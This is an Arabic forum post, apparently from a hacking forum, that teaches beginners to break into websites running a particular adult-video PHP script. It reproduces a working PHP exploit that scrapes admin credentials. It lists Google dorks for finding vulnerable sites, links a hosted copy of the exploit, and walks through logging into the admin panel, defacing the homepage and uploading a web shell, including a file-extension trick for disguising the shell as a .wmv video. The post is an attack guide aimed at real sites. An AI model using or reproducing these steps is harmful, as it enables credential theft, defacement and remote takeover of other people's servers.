العلم كلما أنفقت منه زاد
 
الرئيسيةالبوابةمكتبة الصورالتسجيلدخول

شاطر | 
 

 شـرح ثغرة لاختراق سكربت مواقع جنسية للمبتدئين بالصور

اذهب الى الأسفل 
كاتب الموضوعرسالة
noureddine
Admin
avatar

المساهمات : 150
تاريخ التسجيل : 26/01/2008

مُساهمةموضوع: شـرح ثغرة لاختراق سكربت مواقع جنسية للمبتدئين بالصور   الجمعة يونيو 13, 2008 2:06 am

=]
بــــــــــــــــــــــــــــسم الله الـــــــــــــــرحــــــمـــــن الــــــــــــــرحــــــــيــــــــــــــــم

الحمد لله الذي جعلنا مسلمين م صل و سلم على سيدنا محمد و على آله و صحبه أجمعين و من

تبعهم بإحسان إلى يوم الدين آمين

السلام عليكم و رحمة الله و بركاته أهل بيت الهكر

اليوم باذن الله سنقوم بشرح ثغرة جديدة نزلت تقريبا في جميع مواقع السكيوريتي بتاريخ 2007-12-13

اسم الثغرة هو

Adult ****** Unauthorized Administrative Access Exploit

و الثغرة مكتوبة بلغة PHP

و هذه الثغرة تخص سكربت معين الغرض منه بالتحديد انه يستعمل في المواقع الاباحية التي تعرض

الفيديوهات

نشوف رابط الثغرة معا في موقع الميل ورم

Adult Script <= 1.6 Unauthorized Administrative Access Exploit


كود PHP:
( ($_SESSION['adminid']=="") && ($_SESSION['admintype'] !=1))
{
header("Location: logout.php"); // Bypass Me Very Happy
}
</pre>
<br>
<b>Dork</b>:<br>
inurl:submit-user-link.html<br>
inurl:video-listing-cat<br>
inurl:hosted-videos<br>
inurl:porn-listing-cat<br>
"Powered By Adult******.NET"<br>
"Copyright 2007 [IAG].Adult******.v1.5.Nulled"<br>
<br>
<form method="POST" action="">
<input name="adres" type="text" value="Target example: http://www.site.com/" size="70" onFocus="if(this.value=='Target example: http://www.site.com/')this.value=''" onBlur="if(this.value=='')this.value='Target example: http://www.site.com/'">
<input name="yolla" type="submit" value="Send">
</form>

<br>
<?php
function dosya_indir($liz0){


$ch = curl_init();
$timeout = 0;
curl_setopt ($ch, CURLOPT_URL, $liz0);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
$veri = curl_exec($ch);
curl_close($ch);

return $veri;

}

$desen='|value="(.*)"|';

if($_POST[yolla])
{
$adres=$_POST[adres];

if(!eregi("http",$adres))
{
$adres="http://".$adres;
}
if($adres=="") { echo 'Boş Yerleri Doldurun'; exit(); }
echo 'Target= '.htmlspecialchars($adres)."<br>";
sleep(1);
echo 'Sending Evil Code.......<br>';
$kaynak=dosya_indir($adres."/admin/administrator.php");
sleep(5);

if(eregi('value="',$kaynak)) {
echo "Exploit Has Been Succeful <br>";
preg_match_all($desen,$kaynak,$sonuc);
echo "<a target='_blank' href='".$adres."/admin/'>".$adres."/admin/</a><br>";
echo "<b>Username</b> :".htmlspecialchars($sonuc[1][0])."<br>";
echo "<b>Password</b>:".htmlspecialchars($sonuc[1][1])."<br>";
echo $adres."/admin/videolinks_view.php edit video and upload shell Smile";
}
else
{
echo "Exploit Has Been Failed! <br>";
}


}
?>

# milw0rm.com [2007-12-13]
جيد الان سنتعلم كيف يتم استغلال هذا النوع من الثغرات

الاستغلال يكون كالتالي تقوم بنسخ كود الثغرة كاملا ثم تنسخه بالمفكرة و تقوم بتسميته ثم تحفظ الملف

بامتداد PHP و ترفعه الى موقعك اى لازم اولا يكون عندك مساحة خاصة بك


قمت برفع الملف على مساحة مجانية بـــ ripway لكن الثغرة لم تشتغل لكن انا لم اجرب على موقع

lycos فممكن أن تنجح اذن فما الحل |5|

لازم يكون عندك استضافة مدفوعة لكى يشتغل السكربت تمام

طيب انت تقول انا ما عندي أنا اقولك ولا يهمك وجدت باحد المنتديات التركية الرابط جـــــــــاهز زي

العسل |11|


و هذا رابط الثغرة و قمت بتجربته و هو شغال تمام

http://www.r57.li/adult.php


طيب الان نبدأ بشرح كيفية التعامل مع السكربت و جلب معلومات الادمن |ok|

وهي زبدة الموضوع |7|

تابع الشرح كما في الصورة





كما نلاحظ بالصورة كل شئ وا ضح كما نرى ان السكريت سهل جدا و كل شئ موضح امامك في

السكربت نفسه الان وش تعمل الخطوة الثانية هي البحث عن مواقع مصابة و ذلك باستعمال الدورك في

محرك البحث قوقــــــــــــل شوف الصورة


انا اخترت الدورك الثاني على سبيل المثال لا الحصر انت حر في اختيار ايها شئت |7|

Google


تضع الدورك في محرك البحث و تضغط بحث تابع الصورة



ستلاحظ ظهور نتائج البحث و المواقع المصابة كثيرة و انت كل مرة استعمل دورك مختلف كي توسع

مجال البحث ...مثلا انا اخترت احد المواقع تابع الصورة



الان تروح لرابط السكربت و تبدأ بالعمل بعد ما تختار احد المواقع و بامكانك ان تجرب على الكل واحد

واحد تابع الصورة



الان طبق كما هو موضح في الصورة

كما تلاحظون عند انتهاء العملية و بعد ظهور معلومات الادمن كاتب الثغرة يقول انه بالامكان رفع شل

في الرابط المبين ادناه upload shell انا جربت ارفع شل على شكل صورة لكن ما نجحت الطريقة

معي و هذه اتركها للمحترفيين ان شاء الله يجدون لها حل |7|

طيب انت طبقت خلاص و جبت اسم و كلمة سر الادمن الان تذهب الى رابط الدخول الى لوحة التحكم

تابع الصورة



بعد وضع اسم و كلمة المرور سيتم نقلك الى لو حة تحكم الادمن تابع الصورة



الان ننتقل الى الخطوة الاخيرة و هي تنفيذ الهجوم رفع الاندكس تابع الصورة




بعد رفع الاكواد الخاصة بصفحة اختراقك او كود التحويل لا تنسى شئ مهم تابع الصورة




مبـــــــــــــــــروك الان تم الاختراق اذهب الى الصفحة الرئيسية و شاهد الاختراق



اقتباس:

هذا الاخير خاص بالاخ زيوش
هذي ثغرة اكتشفتها ومانزلت في مواقع السيكيورتي


طريقة البحث

كود:
inurl:submit-user-link.html
inurl:video-listing-cat
inurl:hosted-videos
inurlorn-listing-cat
"Powered By AdultScript.NET"
"Copyright 2007 [IAG].AdultScript.v1.5.Nulled"


بلقتى مواقع مصابة كثير
طريقة الاستغلال
========
الطريقة
تغير اسم الشل الى
shell.php.wmv
وتروح الي كلمة
Submit Video

بيطلع لك مربعات مثل الصورة

وبعدين تروح للصفحة الرئيسية للموقع بتلقى الملف تحمل اضغط بالزر اليمين وخصائص وانسخ رابط الشل وحطه في المتصفح واستمتع بالاختراق خخخخخخخخخخخخخ
اللهم اني برى من ضعاف النفوس
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو http://mohtasib.moontada.net
 
شـرح ثغرة لاختراق سكربت مواقع جنسية للمبتدئين بالصور
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتديات محتسب :: منتديات برامج الكمبيوتر والانترنت :: منتدى المواقع المفيدة-
انتقل الى: